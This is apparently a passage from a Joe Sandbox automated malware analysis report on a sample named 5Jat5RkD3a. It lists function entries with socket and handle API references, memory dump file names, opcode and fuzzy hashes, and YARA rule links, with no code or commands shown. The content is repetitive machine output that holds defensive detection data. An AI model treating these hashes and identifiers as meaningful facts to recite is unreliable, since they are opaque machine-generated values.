                                                              • closesocket.WS2_32(?,00339422,?,?,?,?,?,?,?,?,?,?,?,w32,00708640,00000000), ref: 0033B04D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: 31038a0ed7491fedd7ca43dcc6d36e0f77ab308542def95ce45b1753d48f1515
                                                              • Instruction ID: 7b369f0432dda852532ce40302bd903d15805608d547f24cae5af4f7fd7b894d
                                                              • Opcode Fuzzy Hash: 31038a0ed7491fedd7ca43dcc6d36e0f77ab308542def95ce45b1753d48f1515
                                                              • Instruction Fuzzy Hash: A0D0C23470020157CA288A14C8C4A57B22B7FC0310FAACB68E12C4A150C73BCC838A01
                                                              Function 002D67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,002AAF56,?,00000001), ref: 002D67FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 79498e04bf3d2114ddf467d29d3ebbb7a897d2a68f5be9ea712bf5adade099e6
                                                              • Instruction ID: 51c6bd8fe0380b492677a0af7bca241a7374fac25c3ee312101794ca8da7ecb7
                                                              • Opcode Fuzzy Hash: 79498e04bf3d2114ddf467d29d3ebbb7a897d2a68f5be9ea712bf5adade099e6
                                                              • Instruction Fuzzy Hash: 26C012F1118101EFC60C8714D895A6F76D9DB85355F01582CB04681180EA305990CA16
                                                              Function 002731D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 6c1d102a995c40e295f00e03342e587925eca2ec4f7157e17b13e2ba6c3868d4
                                                              • Instruction ID: 215d2d79f6478cfeddd77f3af81f3886e5b1cc7be3d422048133b3883151d743
                                                              • Opcode Fuzzy Hash: 6c1d102a995c40e295f00e03342e587925eca2ec4f7157e17b13e2ba6c3868d4
                                                              • Instruction Fuzzy Hash: 0E31B3B09193099FCB40EFB8D5856AEBBF5BF44304F00886DE998E7251E7349A44DF92
                                                              Function 005FB160 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 42f54cf0440957404ab84118600b178818b66f6486ed494aac578da307281f5a
                                                              • Instruction ID: 139d5869bfc62b42b621a19b45df80a705bd5e19a8ca711750c10963ec66f21e
                                                              • Opcode Fuzzy Hash: 42f54cf0440957404ab84118600b178818b66f6486ed494aac578da307281f5a
                                                              • Instruction Fuzzy Hash: 4BC04CE0C1464486E740BA38954621D79E47741208FC11B68D98496195F628932C8657
                                                              Function 07000861 Relevance: .3, Instructions: 282COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bedcf8cbb6bb5122f335db648478598cb27938dc50410c989a1e8246b6d2d9c5
                                                              • Instruction ID: 0c7b869084dc35fe8aa828230bdf2f1bf62a9fe15ab939114985506f13ee9e86
                                                              • Opcode Fuzzy Hash: bedcf8cbb6bb5122f335db648478598cb27938dc50410c989a1e8246b6d2d9c5
                                                              • Instruction Fuzzy Hash: 475179EB55C114BCB202C1816B24FFFA76EE7C7730F308A2BF856D1586E2940A4E51B2
                                                              Function 0700082F Relevance: .3, Instructions: 279COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6e26b8a2f1f8b3dc21de13119eb5b08303dd5b40bf2f5b99ecfe4b39aedbb2b
                                                              • Instruction ID: 170ce769a0b946860b9c76d9cfc988a15804880cef6084b8d46a059f30fa8ac0
                                                              • Opcode Fuzzy Hash: d6e26b8a2f1f8b3dc21de13119eb5b08303dd5b40bf2f5b99ecfe4b39aedbb2b
                                                              • Instruction Fuzzy Hash: F05146EB15D114BDB201C1816B14FFFA76EE6C7730F30862BF866E5586E2940A4E51B2
                                                              Function 0700088C Relevance: .3, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8c56876e8a6ea591d73896b4fb78f8a7a630e0a7cc08af0769bb594a6f5d87fc
                                                              • Instruction ID: 3219397f8fad11a7197a2b59c21b6efd08bace15b6df80810a513779d4f71112
                                                              • Opcode Fuzzy Hash: 8c56876e8a6ea591d73896b4fb78f8a7a630e0a7cc08af0769bb594a6f5d87fc
                                                              • Instruction Fuzzy Hash: 0C5146EB15D114BDB10281816B14FFF676EE6C7730F318A2BF857E1586E2980E4E51B2
                                                              Function 07000847 Relevance: .3, Instructions: 271COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de32d92e47f6de8ee8b779082e6c5e68e977e41b611e3d7dba6fa42f3c8c912c
                                                              • Instruction ID: ba976ca322f3822fc7be1940c950f03d316e6e5b46c315d54488272c323819ba
                                                              • Opcode Fuzzy Hash: de32d92e47f6de8ee8b779082e6c5e68e977e41b611e3d7dba6fa42f3c8c912c
                                                              • Instruction Fuzzy Hash: 095125EB15D114BDB102C1816B24FFFA76EE6C7730F318A2BF817E1586E2944A4E51B2
                                                              Function 07000852 Relevance: .3, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3228c1847d155b5f93853564974629bd9ed76d90e1328f1221e0fdc3430f1759
                                                              • Instruction ID: f67d8524e0e507c3f4257c6957f5ee70d5ceb83682d822e8022f47404c52afe5
                                                              • Opcode Fuzzy Hash: 3228c1847d155b5f93853564974629bd9ed76d90e1328f1221e0fdc3430f1759
                                                              • Instruction Fuzzy Hash: EC5134EB15C114BCB102C1816B24FFFA76EE6C7730F318A2BF816E1586E2944E4E11B2
                                                              Function 07000872 Relevance: .3, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ab0fa960a0563d1e6d7f83944e08bf9d2cb99a30ee3bca725f1766f827f306d
                                                              • Instruction ID: d10ed56548a27f04b05d63db7546b0998df0d50a82f206a85157d3b20ba9b877
                                                              • Opcode Fuzzy Hash: 5ab0fa960a0563d1e6d7f83944e08bf9d2cb99a30ee3bca725f1766f827f306d
                                                              • Instruction Fuzzy Hash: C54115EB15D114BDB102C5816B24FFFA76EE6C7730F318A2BF816E1546E2980E4E51B2
                                                              Function 07000811 Relevance: .3, Instructions: 251COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f2a4e5cd34b8cd23b73dfd3e54f7665e7e0441a120156e516d114f4974786f7e
                                                              • Instruction ID: bb901c5e1d48dd89c146f8562bd4a6918fa0abf8e528093ea7c2b356211cf723
                                                              • Opcode Fuzzy Hash: f2a4e5cd34b8cd23b73dfd3e54f7665e7e0441a120156e516d114f4974786f7e
                                                              • Instruction Fuzzy Hash: A44137EB55C114BDB102C1816B24BFF676EE6C7730F308A27F816E1586E2940A4E51B2
                                                              Function 070008A7 Relevance: .2, Instructions: 246COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf8d3205d22ce7701fb019457f69a9ea4d3d362b8549f0ab9fb551bc1994d217
                                                              • Instruction ID: 3d08193a33fba89f05716da3e8d6a71fe5c89f900b410ce573196e350afd6a75
                                                              • Opcode Fuzzy Hash: cf8d3205d22ce7701fb019457f69a9ea4d3d362b8549f0ab9fb551bc1994d217
                                                              • Instruction Fuzzy Hash: B64158EB15C114BDB202C5816B24FFFA76EE6C7730F318A6BF816E1546E2940A4E51B2
                                                              Function 070008FC Relevance: .2, Instructions: 241COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8597c0b1d8dc299301062e83bcafd0b22cd8c4fbd0931eb167cd453d38f01362
                                                              • Instruction ID: 9e82e6f10101799e9e347d7856725f1218520139c1df0f7fba4202b6c4359d30
                                                              • Opcode Fuzzy Hash: 8597c0b1d8dc299301062e83bcafd0b22cd8c4fbd0931eb167cd453d38f01362
                                                              • Instruction Fuzzy Hash: 2D417CEB15C1147DB20285816F24FFFA76EE6C7730F30896BF816D2542E2980E4E51B2
                                                              Function 070008F1 Relevance: .2, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 458b8a5c7c4e9d0d75cd55482372c537382a35bdd76b2c56741e8d73f6dbfc94
                                                              • Instruction ID: 12b472d31c1c1f5b15b0ac2bfaf9d84998f3563e2cf224a2167c6455c4346b62
                                                              • Opcode Fuzzy Hash: 458b8a5c7c4e9d0d75cd55482372c537382a35bdd76b2c56741e8d73f6dbfc94
                                                              • Instruction Fuzzy Hash: 894145EB15C114BDB102C5816B24FFFA76EE6C7730F30892BF816E1546E2940E4E11B2
                                                              Function 07000932 Relevance: .2, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 94e2b41b369872ba9643d08723b9279505432f4ea6e6c436044a9b2e71ab762a
                                                              • Instruction ID: a418ef6bffa3d8014ac4632d11cd099f266987f6f3bc28ab074f6b5f284a99d2
                                                              • Opcode Fuzzy Hash: 94e2b41b369872ba9643d08723b9279505432f4ea6e6c436044a9b2e71ab762a
                                                              • Instruction Fuzzy Hash: 9B4188EB15C1147DB202C1816B14FFFAB6EE6C7730F31896BF816E6546E2980E4E51B2
                                                              Function 0700095D Relevance: .2, Instructions: 207COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 704c971a7be02a1e5ee12e55dda9645a71dcee6a4a0c9ab5c632da766effb060
                                                              • Instruction ID: b75abaab222ae1ece18f17242099a8276172b7797cad4f92426ad27421d6def2
                                                              • Opcode Fuzzy Hash: 704c971a7be02a1e5ee12e55dda9645a71dcee6a4a0c9ab5c632da766effb060
                                                              • Instruction Fuzzy Hash: 564169EB1581147DB202C5816B14FFFA76EE6C7730F30856BF816E6646E2940E4E51B2
                                                              Function 070009A1 Relevance: .2, Instructions: 176COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 67caa67c4dd31b7525f8d864912f3f5f2860cc24e0aaf7db355baa0ba1ad088a
                                                              • Instruction ID: 25add9bad3a4fedb6a1f0af1d201e93d6fe01d510f1a4e7b62efab0e22a59610
                                                              • Opcode Fuzzy Hash: 67caa67c4dd31b7525f8d864912f3f5f2860cc24e0aaf7db355baa0ba1ad088a
                                                              • Instruction Fuzzy Hash: EF3167EB158114BDB20285816B14BFFAB6EE6C7730F30892AF827E1586D2940E5E51B2
                                                              Function 070009C6 Relevance: .2, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b26ebe671051a7776a2f6689d37efb431c46097c3cbc241b85d98d48d457f745
                                                              • Instruction ID: 643be9d089890dced74fef13a97e2a499309efbe27d16b1d9cf9ea3d1c07020e
                                                              • Opcode Fuzzy Hash: b26ebe671051a7776a2f6689d37efb431c46097c3cbc241b85d98d48d457f745
                                                              • Instruction Fuzzy Hash: 683138EB1581147DB102C5812B14BFFAB6EE6C7770F30896AF817E1586D2D80F5E51B2
                                                              Function 070009F4 Relevance: .2, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18c58ea163f47bd4933a4b9641bb45496e4cf795ff616824edbdd7c556ce9141
                                                              • Instruction ID: f0fe536b68bab6dc64b58346c67eba7fb548dd2540f1e553d1aa41896bc34a91
                                                              • Opcode Fuzzy Hash: 18c58ea163f47bd4933a4b9641bb45496e4cf795ff616824edbdd7c556ce9141
                                                              • Instruction Fuzzy Hash: 4D2128EB198114BDB11285856B24BFFA76EE3C7730F308A27F827D1586D2D40B5E60B2
                                                              Function 070009E6 Relevance: .2, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e8f5c002d6a5f6e61a75f98e16f925e642b9f892f565d78a30fc8768237fb84
                                                              • Instruction ID: 5b6eafcf5714b6e820da9f43d0b38db2457d1cf9d4175b33e5ef932ee9f620fe
                                                              • Opcode Fuzzy Hash: 6e8f5c002d6a5f6e61a75f98e16f925e642b9f892f565d78a30fc8768237fb84
                                                              • Instruction Fuzzy Hash: A421F7EB158114BDB11285816B24BFFA76EE2C7730F308527F817E1546D2D80B5E2072
                                                              Function 07000A14 Relevance: .1, Instructions: 142COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0264e722eb8002bef8cd0bb64ae4c971577f4831209587560a2609bb66746b41
                                                              • Instruction ID: c1e9dc07a1d10fdb74e9dac7725601572d53cb82bbf756887e5ce4511fad74fe
                                                              • Opcode Fuzzy Hash: 0264e722eb8002bef8cd0bb64ae4c971577f4831209587560a2609bb66746b41
                                                              • Instruction Fuzzy Hash: BF21D4EB1981147CB10285816B24BFFA76EE2C7730F30892BF817E1546D2D40F5E6072
                                                              Function 07000A2B Relevance: .1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 296bfcc2ba6e9fce3c9f249106b2643b61a4758f03ffae0c1d38d65ccf3583e9
                                                              • Instruction ID: 6ffa273133e1d7d3687b6e828fb378249704c480ccefacc7268e47eee084747b
                                                              • Opcode Fuzzy Hash: 296bfcc2ba6e9fce3c9f249106b2643b61a4758f03ffae0c1d38d65ccf3583e9
                                                              • Instruction Fuzzy Hash: FB21AFEB258114BDB10285816B24BFFA76EE6C7730F30892BF817E0546D2954F5E6172
                                                              Function 07000A3C Relevance: .1, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24640b72d7c7c0a6b3342ee47bfbb06619cb2fdce02c163dfcb55785085591a8
                                                              • Instruction ID: fdb24f4a5276ec6b28c105564947c3a78377f892aef86c26cf479c72a2aac84a
                                                              • Opcode Fuzzy Hash: 24640b72d7c7c0a6b3342ee47bfbb06619cb2fdce02c163dfcb55785085591a8
                                                              • Instruction Fuzzy Hash: 4621D5EB158114BDB10285816B24BFFA77EE6C6B30F30896AF827D1546E2D40E5E5172
                                                              Function 07000A6C Relevance: .1, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
